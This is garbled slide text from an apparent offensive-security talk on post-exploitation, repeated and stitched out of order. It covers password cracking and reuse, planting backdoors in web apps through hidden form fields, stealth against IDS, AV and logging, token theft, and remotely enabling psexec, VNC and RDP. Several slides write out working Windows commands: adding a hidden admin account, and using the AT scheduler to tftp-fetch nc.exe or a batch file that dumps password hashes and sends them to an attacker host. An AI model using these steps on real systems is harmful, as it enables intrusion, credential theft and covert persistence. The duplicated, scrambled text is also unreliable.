bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
